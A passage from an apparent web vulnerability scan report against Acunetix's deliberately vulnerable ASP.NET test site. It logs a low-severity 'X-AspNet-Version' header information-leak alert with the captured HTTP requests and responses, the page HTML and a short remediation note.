          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        4. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
